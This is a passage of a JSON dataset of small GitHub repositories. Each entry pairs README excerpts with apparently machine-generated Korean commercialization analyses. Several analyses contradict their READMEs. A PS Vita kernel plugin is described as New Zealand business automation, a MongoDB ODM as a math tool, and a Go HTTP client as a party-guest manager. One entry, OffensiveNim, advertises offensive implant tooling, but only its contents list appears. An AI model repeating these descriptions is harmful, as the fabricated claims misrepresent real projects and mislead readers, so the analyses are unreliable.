dependencies:\n```sh\nnpm install\n```\n\nPlace your own MongoDB URI in `config/db.config.json`\n\nRun the server in dev mode:\n```sh\nnpm run dev\n```\nDeployment: \n```sh\nnpm run build\nnpm start\n```\n\nView in browser at `http://localhost:3000`\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"narcello/findead","github_url":"https://github.com/narcello/findead","stars":8,"language":"Shell","license":"MIT","abandonment_months":30,"description":"# narcello/findead 사업화 분석\n\n## 왜 보물인가\n죽은 코드(사용되지 않는 프로그램 부분)를 자동으로 찾아내서 소프트웨어를 더 깔끔하고 효율적으로 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 소프트웨어 개발팀이 월 구독으로 이용하는 웹 기반 코드 분석 플랫폼\n- **내부 업무 도구**: 대형 IT회사의","readme_excerpt":"# :mag: findead\nDead react components finder\n\n\n[![NPM Version](https://img.shields.io/npm/v/findead?logo=npm)]()\n[![NPM Downloads](https://img.shields.io/npm/dw/findead?logo=npm)]()\n[![Run Tests](https://github.com/narcello/findead/actions/workflows/test.yml/badge.svg)](https://github.com/narcello/findead/actions/workflows/test.yml)\n\n## :rocket: *Dead Components* is the Motivation\nMany times in large or even small projects, we forgot some components in code that we'll never use and we never take time to search one by one and remove.\n\n## :camera: Demonstration\n![Demonstration](https://user-images.githubusercontent.com/6786382/73863397-c3d5aa00-481e-11ea-9360-0a530a93cd4a.png)\nWhen findead finish, you'll can see:\n* Components name\n* Path of each one component\n* Size of each one file\n* How many dead components\n* How many browsed files\n* How much time spent to execution\n## :computer: Tech\nJust bash :) \n\n## :inbox_tray: Install\n* Npm\n```sh \nnpm i -g findead\n```\n* Yarn\n```sh \nyarn add findea","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Actyx/cambria","github_url":"https://github.com/Actyx/cambria","stars":6,"language":"Idris","license":"unknown","abandonment_months":57,"description":"# Cambria 저장소 분석\n\n## 왜 보물인가\n서로 다른 데이터 형식을 자동으로 변환해주는 기술로, 여러 시스템을 연결할 때 생기는 호환성 문제를 깔끔하게 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사의 기존 데이터베이스를 우리 플랫폼으로 자동 옮기는 기능 제공\n2. **내부 업무 도구**: 회사의 여러 부서가 사","readme_excerpt":"# Cambria\n\nUse lenses to maintain forwards and backwards compatibility with your software. Cambria minimizes\nallocations using `rkyv` for zero copy deserialization and is formally verified with idris.\n\nInspired by [https://www.inkandswitch.com/cambria.html](https://www.inkandswitch.com/cambria.html).\n\n## Getting started\n\nAdd your lenses to your `build.rs` file.\n\n```rust\nuse cambria::{Kind, Lens, Lenses, PrimitiveKind};\nuse std::process::Command;\n\nfn main() {\n    let tokens = cambria::precompile(\"Doc\", Lenses::new(vec![\n        Lens::Make(Kind::Object),\n        Lens::AddProperty(\"shopping\".into()),\n        Lens::LensIn(\n            \"shopping\".into(),\n            Box::new(Lens::LensMap(Box::new(Lens::Make(Kind::Primitive(\n                PrimitiveKind::Text,\n            ))))),\n        ),\n    ]));\n    std::fs::write(\"src/schema.rs\", tokens.to_string()).unwrap();\n    Command::new(\"rustfmt\")\n        .arg(\"src/schema.rs\")\n        .arg(\"--emit\")\n        .arg(\"files\")\n        .status()\n       ","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"zeyademam/active_learning","github_url":"https://github.com/zeyademam/active_learning","stars":8,"language":"Python","license":"MIT","abandonment_months":55,"description":"# Active Learning 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 스스로 학습하는 과정에서 **가장 필요한 데이터가 무엇인지 판단해 효율을 극대화하는 기술**로, AI 개발 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 학습 데이터 라벨링 SaaS**: 의료/제조 회사들이 정말 필요한 이미지만 표시하도록 자동 추천하는 웹 ","readme_excerpt":"# Active Learning at the ImageNet Scale\n\nThis repo contains code for the following paper:\n```\n@misc{emam2021active,\n      title={Active Learning at the ImageNet Scale}, \n      author={Zeyad Ali Sami Emam and Hong-Min Chu and Ping-Yeh Chiang and Wojciech Czaja and Richard Leapman and Micah Goldblum and Tom Goldstein},\n      year={2021},\n      eprint={2111.12880},\n      archivePrefix={arXiv},\n      primaryClass={cs.CV}}\n```\n\nPlease cite our work if you use this code. \n\n## Requirements\n\n`pip install -r requirements.txt`\n\n## Comet and Logging\n\nThis project uses Comet ML to log all experiments, you must\ninstall [comet_ml](https://www.comet.ml) (included in requirements.txt), however, the code does not\nrequire the user to have a Comet ML account or to enable comet logging at all. If you choose to use\ncomet ML, then you should include your API key in your home directory\n`~/.comet.config` (more on this in the Comet ML documentation). To use comet make sure the use the\nflag `--enable_comet`.\n\nL","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"toshi0383/CircleProgressButton","github_url":"https://github.com/toshi0383/CircleProgressButton","stars":5,"language":"Swift","license":"MIT","abandonment_months":80,"description":"# CircleProgressButton 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 버튼을 누를 때 동그란 진행 상황을 표시해주는 깔끔한 디자인 기능으로, 사용자 경험을 한 단계 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **사내 앱 개발 팀의 UI 도구 라이브러리**: 모바일 앱을 자주 만드는 회사들이 자체 디자인 시스템에 통합하여 개","readme_excerpt":"CircleProgressButton\n---\nUIView based circle button with CAShapeLayer based progress stroke.\n\n![](https://github.com/toshi0383/assets/blob/master/CircleProgressButton/circle-progress-button.gif)\n![](https://github.com/toshi0383/assets/blob/master/CircleProgressButton/border-progress.gif)\n![](https://github.com/toshi0383/assets/blob/master/CircleProgressButton/dashed-yellow-circle.gif)\n![](https://github.com/toshi0383/assets/blob/master/CircleProgressButton/blue-circle-less-animations.gif)\n\n![platforms](https://img.shields.io/badge/platforms-iOS-yellow.svg)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![Cocoapods](https://img.shields.io/badge/Cocoapods-compatible-brightgreen.svg)](https://cocoapods.org)\n[![pod](https://img.shields.io/cocoapods/v/CircleProgressButton.svg?style=flat)](https://cocoapods.org/pods/CircleProgressButton)\n\n# Requirements\n- iOS9+\n- Swift4.2\n\n# How to use\n\n## Customize Appe","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"ezefranca/the-missing-apple-watch-loader","github_url":"https://github.com/ezefranca/the-missing-apple-watch-loader","stars":6,"language":"Swift","license":"MIT","abandonment_months":103,"description":"# The Missing Apple Watch Loader 분석\n\n## 왜 보물인가\nApple Watch 앱 개발자들이 겪는 번거로운 설정 과정을 자동화해주는 희귀한 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **Apple Watch 앱 개발사 대상 SaaS**: 개발 시간을 단축해주는 클라우드 기반 서비스로 월 구독 판매\n2. **기업 내부 개발팀 도","readme_excerpt":"# The missing apple watch loader\n\n![](https://media.giphy.com/media/l4Ep3igr1qTS1dkxa/giphy.gif)\n\n# 🐧 How to use?\n\nPut a centralized ```WKInterfaceImage``` in your storyboard, create the ```@IBOutlet``` copy the images to the correct bundle and implement the ***start*** and ***stop*** loader.\n\n### Example\n\n```swift\n    @IBOutlet var loader: WKInterfaceImage!\n    \n    func showLoader() {\n        loader.setImageNamed(\"loader\")\n        loader.startAnimatingWithImages(in: NSRange(location: 1,\n                                                    length: 8), duration: 0.8, repeatCount: -1)\n    }\n    \n    func stopLoader() {\n        self.loader.stopAnimating()\n    }\n    \n```\n\nThe image name ```loader``` :\n\n![](folder.png)\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"adriennetacke/advent-of-code-2019","github_url":"https://github.com/adriennetacke/advent-of-code-2019","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# Advent of Code 2019 풀이 저장소 분석\n\n## 왜 보물인가\n매년 수천 명이 참가하는 프로그래밍 문제 풀이 챌린지의 완성된 솔루션 모음으로, 코딩 학습자들이 참고할 수 있는 실제 해결책을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS 플랫폼**: 코딩 초보자 대상 온라인 강좌에서 문제 풀이 예시 및 학습 자료로 판매\n2. ","readme_excerpt":"# advent-of-code-2019\nAdvent of Code 2019 🎄 JavaScript Solutions by \n`@adriennetacke` 😊\n[Blog](https://blog.adrienne.io/)\n|\n[Twitter](https://twitter.com/adriennetacke)\n|\n[Instagram](https://www.instagram.com/adriennetacke)\n\n[![Build Status](https://github.com/adriennetacke/advent-of-code-2019/workflows/build/badge.svg)](https://github.com/adriennetacke/advent-of-code-2019/actions)\n[![MIT license](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\n\n\n## What is Advent of Code?\n[Advent of Code](http://adventofcode.com) is an online event created by [Eric Wastl](https://twitter.com/ericwastl). Each year, starting on Dec 1st, an advent calendar of small programming puzzles are unlocked once a day at midnight (EST/UTC-5). Developers of all skill sets are encouraged to solve them in any programming language they choose!\n\n## Advent of Code 2019 Story\nSanta has become stranded at the edge of the Solar System while delivering presents to other planets! To a","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"shametha/WoMentr","github_url":"https://github.com/shametha/WoMentr","stars":6,"language":"Dart","license":"unknown","abandonment_months":52,"description":"# WoMentr 저장소 분석\n\n## 왜 보물인가\n여성 멘토링 및 커리어 지원 플랫폼으로, 성별 격차가 큰 기술·경영 분야에서 여성 인재 육성이라는 사회적 수요를 충족할 수 있는 가치 있는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 인사부서가 여직원 육성 프로그램으로 구독하는 온라인 멘토링 플랫폼\n- **내부 업무 도구**","readme_excerpt":"# WoMentr\n\nWoMentr is a virtual anonymous app. Women can post their problems, doubts, and ideas. To every question asked, other women users from across the globe can comment, answer, upvote or downvote. The novelty of the app is that the identity of the user is never revealed to anyone so women can freely discuss their problems without the fear being judged and no abusive words/images can be uploaded. Also the app will be secured using login credentials to ensure integrity.\nThis application uses Firebase as backend and basic tensorflow for analysing images. \n\n<br><br>**Login and SignUp Screen** <br><br>\n![1 LoginScreen](https://user-images.githubusercontent.com/59509542/146630224-946a6c0b-bbc4-443c-afe9-ab6b44a213b0.JPG) ![2  SignUp Screen](https://user-images.githubusercontent.com/59509542/146630226-f3250b36-3153-465b-9ca6-553e9940547f.JPG)\n\n<br><br> **Home Screen and Questions of a Theme** <br><br>\n![3 HomeScreen](https://user-images.githubusercontent.com/59509542/146630227-c34cdc02-","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"eceyarent/KadinaSiddeteHayir","github_url":"https://github.com/eceyarent/KadinaSiddeteHayir","stars":10,"language":"Dart","license":"unknown","abandonment_months":52,"description":"# KadinaSiddeteHayir 저장소 분석\n\n## 왜 보물인가\n마지막 업데이트가 2022년이고 기본 정보가 거의 없어 프로젝트의 실제 목적과 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n현재 정보 부족으로 구체적인 활용 시나리오를 특정하기 어렵습니다. 저장소의 코드 내용과 문서를 확인해야 가능성 있는 비즈니스 모델을 파악할 수 있습니다.\n","readme_excerpt":"# KADINA ŞİDDETE HAYIR\n**1.PROJENİN AMACI**\n\nBu proje Android ve Ios işletim sistemine sahip kullanıcılara yönelik olup, şiddete maruz kalan kadınların şiddet anında kendilerini savunabilmeleri ve yakınlarını bilgilendirebilmeleri amacıyla geliştirildi.\n\n**2.PROJENİN TASARIMI**\n\nUygulamada ilk olarak giriş yapma ve kayıt olma ekranıyla açılmaktadır.Daha önce sisteme kayıtlı kişi bilgileriyle giriş yapabilir ve ana sayfaya yönlendirilir aynı şekilde yeni kayıt olup giriş yapan kullanıcılarda ana sayfa ile karşılaşacaklardır.\n\n<img src=\"https://user-images.githubusercontent.com/74072821/123165366-d042bd00-d47c-11eb-9889-2bd703d8bfc6.jpg\" height=\"400\">\n\nAna sayfada 6 adet icon buton , 3 adet raised buton bulunmakta ve her birinin ayrı özellikleri vardır. Kullanıcılar ana sayfadaki yakınlar bölümünde yeni yakınlar ekleyerek arama,mesaj gönderme,konum gönderme icon butonlarını kullanabilecektir.Ayrıca sayfada ses, fener ve güvenlik icon butonları ile gerekli sayfalara giderek kullanılacaktı","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"gulsume/tweetik-karakter-analizi","github_url":"https://github.com/gulsume/tweetik-karakter-analizi","stars":10,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":42,"description":"","readme_excerpt":"# tweetik-karakter-analizi\n\nTwitter etkileşimleri ile kişilerin karakter analizi.\n\nGünümüzde twitter kullanıcıları etkileşimelleri ile düşünce yapısı, karakteristik özellikleri ve ruh hali gibi birçok konuda kişisel veriler sunarak karakter analizi konusunda birçok veri barındırır. \n\n<img src=\"https://github.com/gulsume/tweetik-karakter-analizi/blob/master/Images/tweet.jpeg\">\n\nBu projede tweet,retweet ve mention verileri dikkate alınarak kariyer yöneticileri tarafından oldukça tercih edilen Myers- Briggs Kişilik Tipleri Envanteri ile kategorize edilmesi ve karakteristik analizlerin yapılması amaçlanmıştır.\n\nAlternatif Türkçe doğal dil işleme kütüphanelerine bir göz atalım:\n\nKütüphane | Avantajları | Dezavantajları\n------------ | ------------ | -------------\nZemberek-NLP | Morfolojik kök-bağlam ilşkisi güçlü. | Gürültülü text verisini arındırabilecek 'stop-words' desteği yetersiz.\nNLTK | Türkçe text ayıklama işlevi mevcut. | 'Stop-words' veri seti kısıtlı.\nspaCY | Gürüntü arındırma konu","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"meteko/image-resizer","github_url":"https://github.com/meteko/image-resizer","stars":6,"language":"PHP","license":"unknown","abandonment_months":49,"description":"# image-resizer 저장소 분석\n\n## 왜 보물인가\n사진이나 이미지를 자동으로 작은 크기로 변환해주는 도구로, 웹사이트 속도를 빠르게 하거나 저장 공간을 절약하려는 사람들이 필요로 하는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 블로그나 온라인 포트폴리오 사이트에서 사용자가 업로드한 사진을 자동으로 최적화하는 ","readme_excerpt":"# Neos CMS Image Resizer\n\nOn upload, the uploaded asset will be replaced, with a resized version.\n\n## Installation\n\n`composer require meteko/image-resizer`\n\n## Configuration\n\nThe configuration is possible with the same values from `ThumbnailConfiguration` [(see code)](https://github.com/neos/media/blob/master/Classes/Domain/Model/ThumbnailConfiguration.php) used for ThumbnailPresets.\n\n## Example\n\nTo automatically resize to a maximum width of 1024 and maximum height of 800, the configuration is this\n\n```\nMeteko:\n  ImageResizer:\n    configuration:\n      maximumWidth: 1024\n      maximumHeight: 800\n```\n\n## Support\n\nFree support in the [Neos Slack channel](http://slack.neos.io/) and bug/features via the **Issues** and **Merge request** feature ohere on Github!\n\n## Do you want to create great things, together?\n\nMeteko is a web agency creating online solutions and great user experiences.\n\nWe love making the complex, user friendly.","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"pfnet/pynif3d","github_url":"https://github.com/pfnet/pynif3d","stars":5,"language":"Python","license":"MIT","abandonment_months":58,"description":"# PyNIF3D 상용화 분석\n\n## 왜 보물인가\n3차원 이미지를 자동으로 분석하고 인식하는 기술로, 제조·의료·건설 등 현실 세계의 물체를 디지털로 변환하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 3D 스캔 분석 플랫폼**\n- 건설 현장의 진행 상황을 사진으로 촬영하면 자동으로 완성도를 분석해주는 온라인 서비스\n- 월 구","readme_excerpt":"# PyNIF3D\n\n[![License: MIT](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/pfnet/pynif3d/blob/master/LICENSE)\n[![Read the Docs](https://readthedocs.org/projects/pynif3d/badge/?version=latest)](https://pynif3d.readthedocs.io/en/latest/)\n\nPyNIF3D is an open-source PyTorch-based library for research on neural implicit\nfunctions (NIF)-based 3D geometry representation. It aims to accelerate research by \nproviding a modular design that allows for easy extension and combination of NIF-related\ncomponents, as well as readily available paper implementations and dataset loaders.\n\nAs of August 2021, the following implementations are supported:\n\n- [NeRF: Representing Scenes as Neural Radiance Fields for View Synthesis (Mildenhall et al., 2020)](https://arxiv.org/abs/2003.08934)\n- [Convolutional Occupancy Networks (Peng et al., 2020)](https://arxiv.org/abs/2003.04618)\n- [Multiview Neural Surface Reconstruction by Disentangling Geometry and Appearance (Yariv et al., 2020)](htt","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"ChevyRay/aoc2021","github_url":"https://github.com/ChevyRay/aoc2021","stars":6,"language":"Rust","license":"MIT","abandonment_months":54,"description":"# ChevyRay/aoc2021 상용화 분석\n\n## 왜 보물인가\n매년 열리는 프로그래밍 퍼즐 대회(Advent of Code)의 2021년 문제 풀이 모음으로, 복잡한 알고리즘 학습 자료로 활용 가치가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **코딩 교육 플랫폼**: 초급자용 단계별 문제 풀이 튜토리얼 SaaS로 구독형 학습 서비스 제공\n2. **기업","readme_excerpt":"# Advent of Code 2021\nThese are puzzles for the [Advent of Code 2021](https://adventofcode.com/2021)\nchallenge, written and solved in the [Rust](https://www.rust-lang.org/) programming language.\n\nThe puzzle for each day is in its own folder in `src/bin`, and can be run\nusing the following command (from the root folder):\n\n```\ncargo run --bin day1\n```\n\nIf a particular day has tests, you can also run those:\n\n```\ncargo test --bin day1\n```\n\n## The Puzzles\nThis year, I've put each day into its own folder because then I can give\neach its own README. I'll use this to write a little explanation of how\nit works, why I did something a certain way, or some other useful notes\nthat may be helpful to people learning.\n\n- [Day 1 - The First Day](src/bin/day1)","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Alh4zr3d/OffensiveNim","github_url":"https://github.com/Alh4zr3d/OffensiveNim","stars":6,"language":"","license":"BSD-2-Clause","abandonment_months":55,"description":"# OffensiveNim 저장소 분석\n\n## 왜 보물인가\n보안 전문가들이 시스템 취약점을 찾기 위해 사용하는 고급 도구 모음으로, 보안 컨설팅 사업의 핵심 자산이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **보안 진단 SaaS**: 기업의 시스템 보안 상태를 자동으로 점검해주는 온라인 서비스\n- **내부 보안 감시 도구**: 기업 IT팀이 자체 네","readme_excerpt":"<p align=\"center\">\n    <img height=\"300\" alt=\"OffensiveNim\" src=\"https://user-images.githubusercontent.com/5151193/98487722-ed729600-21e1-11eb-9d77-a79b0f3634de.png\">\n</p>\n\n# OffensiveNim\n\nMy experiments in weaponizing [Nim](https://nim-lang.org/) for implant development and general offensive operations.\n\n## Table of Contents\n\n- [OffensiveNim](#offensivenim)\n  * [Why Nim?](#why-nim)\n  * [Examples in this repo](#examples-in-this-repo)\n  * [Compiling the examples](#compiling-the-examples-in-this-repo)\n  * [Cross Compiling](#cross-compiling)\n  * [Interfacing with C/C++](#interfacing-with-cc)\n  * [Creating Windows DLLs with an exported DllMain](#creating-windows-dlls-with-an-exported-dllmain)\n  * [Optimizing executables for size](#optimizing-executables-for-size)\n  * [Reflectively Loading Nim Executables](#reflectively-loading-nim-executables)\n  * [Executable size difference with the Winim Library](#executable-size-difference-when-using-the-winim-library-vs-without)\n  * [Opsec Considiratio","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"uk0/r_txt","github_url":"https://github.com/uk0/r_txt","stars":6,"language":"Go","license":"unknown","abandonment_months":47,"description":"# uk0/r_txt 저장소 분석\n\n## 왜 보물인가\n텍스트 데이터를 간단하게 정리하고 관리할 수 있는 도구로, 문서 작업이 많은 누구나 업무 효율을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 문서 정리 플랫폼으로 월 구독료를 받고 클라우드 서비스 제공\n- **내부 업무 도구**: 회사의 보고서, 회의록, 공지사항을 ","readme_excerpt":"#### r_txt\n\n\n##### 这个工具太有意思了，感谢`一个俗人`\n\n##### quick start\n\n\n```bash\n# 找到 http://www.boquku.com/book/4622/3084968.html\n# 执行程序 默认只支持 http://www.boquku.com/\n# /book/4622/3084968.html = 第一章 或者 其他章节\n# ./r_txt /book/4622/3084968.html\n# 命令使用： [?]:help [↑]:j [↓]:k [b]:Boss Key [c]:下一章 [q]:exit [g]:Show/Hide Grid, [q]:Quit\n# 第二次使用 直接执行即可 ./r_txt # 看书记录在 /tmp/r_txt/pos(自己创建路径即可 /tmp/r_txt)\n# 纯属娱乐 不要上班使用哈。\n# 纯属娱乐 不要上班使用哈。\n# 纯属娱乐 不要上班使用哈。\n```\n\n\n\n##### Test\n* View the recording at:\n* https://asciinema.org/a/hOF0dHsgdv0foyvyJG5vUP2qn\n\n#####  感谢\n* 感谢以下老哥的工具。\n* https://github.com/TimothyYe/glance\n\n\n\n##### 猴子脚本\n\n* 0 `tmjs/tools.js`\n* 1.添加油候\n* 2.修改目标网址\n* 3.找到一个内容 copy `jsPath`\n* 4 修改`jsPath`\n* 5 启动\n\n\n\n##### show \n\n![](demo.gif)","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"MOZGIII/port-map-operator","github_url":"https://github.com/MOZGIII/port-map-operator","stars":8,"language":"Go","license":"MIT","abandonment_months":41,"description":"# Port Map Operator 상용화 분석\n\n## 왜 보물인가\n네트워크 연결 문제를 자동으로 진단하고 해결해주는 도구로, 기술팀이 없는 작은 회사도 복잡한 네트워크 관리를 쉽게 할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스** - 클라우드 기반 네트워크 관리 플랫폼으로, 회사들이 자신의 서버 상태를 웹에서 직접 모니터링할","readme_excerpt":"# port-map-operator\n\nA `LoadBalancer` `Service` type implementation for small home clusters.\n\nMaps the ports from your router to a Kubernetes cluster node\nvia the [Port Control Protocol](https://tools.ietf.org/html/rfc6887).\n\nIt does not perform real load balancing of any kind, but just takes care of\nthe port forwarding so traffic can reach the cluster node.\nKubernetes still does its internal service-level load balancing.\n\n## Requirements\n\n- Kubernetes cluster that can run `Pod`s with `hostNetwork: true`\n- Router that supports [PCP](https://tools.ietf.org/html/rfc6887)\n  for port mapping\n- No other controllers implementing `LoadBalancer` `Service` type running in\n  the cluster (to avoid conflicts)\n\n## Deployment\n\nSee the `config` dir.\n\nUse the `config/default` as a Kustomization base, don't forget to update the\nimage to a non-rolling docker tag (using rolling tags like `latest`, `nightly`\nor `master` is not recommended).\n\nIf you have issues with PCP server autodiscovery, you can specif","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"billinghamj/fix-es-imports","github_url":"https://github.com/billinghamj/fix-es-imports","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":50,"description":"# billinghamj/fix-es-imports 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만드는 개발자들이 자주 겪는 코드 정리 문제를 자동으로 해결해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자용 온라인 코드 정리 플랫폼으로 구독 판매\n2. **내부 업무 도구**: 대형 IT 회사의 개발팀이 자체 프로젝트 관리 시스","readme_excerpt":"# fix-es-imports\n\nFixes your ES import paths - from Node-style to explicit filenames\n\n## What\n\nTurns:\n\n```js\nimport fs from 'fs';\nimport x from './x';\nimport { y } from './y';\nexport { default as z } from './z';\n```\n\nInto:\n\n```js\nimport fs from 'fs';\nimport x from './x.mjs';\nimport { y } from './y/index.js';\nexport { default as z } from './z.json';\n```\n\n## How\n\n```bash\nnpx fix-es-imports\n```\n\n## Why\n\nDid you use ES module syntax before it was ~cool~ implemented? And then maybe didn't completely respect the exact rules around explicit filenames? But it was okay, right, since Babel didn't really mind...\n\nAnd then you used `--experimental-modules` with `.mjs` files from Node 8.9.0, and it pretty much worked perfectly. And you were super happy you could finally stop using Babel with Node code.\n\nAnd then Node 11.4.0 came along, and it all stopped working. They were actually enforcing the rules now! Oops. And maybe there are a few thousand references to deal with, so maybe you left it for a ","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"MontaEllis/Framework-of-GAN-Inversion","github_url":"https://github.com/MontaEllis/Framework-of-GAN-Inversion","stars":5,"language":"Python","license":"MIT","abandonment_months":27,"description":"# MontaEllis/Framework-of-GAN-Inversion 분석\n\n## 왜 보물인가\nAI를 이용해 사진이나 이미지를 자동으로 수정·변형할 수 있는 기술로, 사진 편집 앱이나 얼굴 보정 서비스 등에 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **사진 편집 SaaS**: 사용자가 올린 사진을 자동으로 보정하고 스타일을 바꿀 수 있는 웹","readme_excerpt":"# Framework of GAN Inversion\n\n## Introcuction\n* You can implement your own inversion idea using our repo. We offer a full range of tuning settings (in hparams.py), some excellent backbones and classics loss functions. You can modify the arch of network or loss easily.\n\n## Recent Updates\n* 2021.9.1 The simplfied framework of GAN Inversion is released.\n\n## Requirements\n* pip install git+git://github.com/lehduong/torch-warmup-lr.git\n* PyTorch1.7\n\n## Train\n### Without DDP\n`python train.py`\n### With DDP\n`python -m torch.distributed.launch --nproc_per_node=nums_gpus train.py`\n## Done\n### Tuning Setting\n* Apply_init\n* Optimizer_mode\n* Scheduler_mode\n* Open_warn_up\n\n### Backbone\n* GradualStyleEncoder from [restyle-encoder](https://github.com/yuval-alaluf/restyle-encoder) and [pixel2style2pixel](https://github.com/eladrich/pixel2style2pixel)\n* ResNetGradualStyleEncoder from [restyle-encoder](https://github.com/yuval-alaluf/restyle-encoder) and [pixel2style2pixel](https://github.com/eladrich/pix","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"fitmin-finance/fitmin-contract","github_url":"https://github.com/fitmin-finance/fitmin-contract","stars":6,"language":"Solidity","license":"unknown","abandonment_months":61,"description":"# fitmin-finance/fitmin-contract 분석\n\n## 왜 보물인가\n금융 거래를 안전하게 자동화하고 추적할 수 있는 디지털 계약 시스템으로, 중소 금융회사들의 수작업을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 증권사나 자산관리회사를 위한 자동 계약 체결 및 관리 플랫폼\n2. **내부 업무 도구**:","readme_excerpt":"# Fitmin Finance\n\n\nThe Fitmin Finance is a community driven project, fair launched Defi. Two Simple functions occur during each trade: \n\n1. Reflection: FTM's holders earn passive reward via static reflection as your balance of FTM will grow indefinely.\n2. Liquidity Acquisition: Every Trade automatically contributes to the liquidity pools.  \n\nProject Website: https://fitmin.finance/\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"GrapheneCt/VVNZRunner","github_url":"https://github.com/GrapheneCt/VVNZRunner","stars":6,"language":"C","license":"unknown","abandonment_months":45,"description":"# GrapheneCt/VVNZRunner 분석 보고서\n\n## 왜 보물인가\n뉴질랜드 시장의 특정 업무 자동화를 위해 맞춤형으로 만들어진 도구로, 틈새시장 전문성을 갖추고 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 뉴질랜드 기업의 반복적인 데이터 처리나 보고서 작성 자동화\n- **API 판매**: 뉴질랜드 특화 자동화 기능을 B2B 고","readme_excerpt":"# VVNZRunner\n\nKernel plugin for PS Vita that provides API to run Toshiba MeP code on Venezia.\nIt supports execution of MeP ELFs directly from userland-allocated memblock.\n\nOriginal idea from PS Vita Henkaku wiki [article](https://wiki.henkaku.xyz/vita/Venezia).\n\nVVNZRunner provides safe way to run MeP code on Venezia processor and functions to transfer data from and to Venezia SPRAM.\n\n![alt text](https://github.com/GrapheneCt/VVNZRunner/blob/main/scr.PNG?raw=true)\n\n# V-Thread support\n\nV-Threads are threads that run on Venezia cores. Up to 6 cores can run tasks simultaneously in normal mode and up to 7 in extended mode (enabled with sceCodecEngineChangeNumWorkerCoresMax()). All tasks that fall outside of limit will be automatically scheduled for execution. Note that even when running V-Thread, vnzBridgeExec() is blocking on ARM side. Refer to sample_mep for V-Thread creation procedure.\n\n# Venezia memory management system\n\nVenezia uses specific memory management system for all external m","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"osvaldoabel/rest-party","github_url":"https://github.com/osvaldoabel/rest-party","stars":6,"language":"Go","license":"MIT","abandonment_months":55,"description":"# rest-party 상업화 분석\n\n## 왜 보물인가\n파티나 이벤트 참석자들을 쉽게 관리하고 초대장을 보낼 수 있는 간단한 도구로, 소규모 행사 주최자들이 번거로운 엑셀 관리에서 벗어날 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독으로 소규모 이벤트 주최자(결혼식, 생일파티, 회사 행사)에게 게스트 관리 플랫폼 제공","readme_excerpt":"# rest-party\nA simple GO Http Client \n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"yuval-a/derivejs","github_url":"https://github.com/yuval-a/derivejs","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":33,"description":"# DeriveJS 분석 보고서\n\n## 왜 보물인가\n복잡한 수학 계산을 자동으로 처리해주는 도구로, 수학이나 과학 분야의 소프트웨어 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육용 SaaS**: 학생들을 위한 온라인 수학 문제 풀이 플랫폼에 내장하여 자동 검증 기능 제공\n2. **내부 업무 도구**: 금융사나 보험사의 복","readme_excerpt":"\n[Summary](https://yuval.hashnode.dev/derivejs-a-reactive-odm-object-data-mapper-framework-for-mongodb-and-nodejs-ckfspl31f02ryv6s1asqy6wvh) | [Reference](https://github.com/yuval-a/derivejs/blob/master/reference.md) | [Comparison to Mongoose](https://github.com/yuval-a/derivejs/blob/master/mongoose-derive-migration.md) | [Demonstration](https://github.com/yuval-a/spaceships-derivejs-demo)\n\n## Introduction\n**DeriveODM** (formerly *DeriveJS*)  lets you manipulate and create Javascript data objects, while **automatically** and **transparently** persisting and updating them on a database (such as MongoDB), in the background, without any additional hassle or code.\n\nIt wraps your data classes and objects with [Javascript 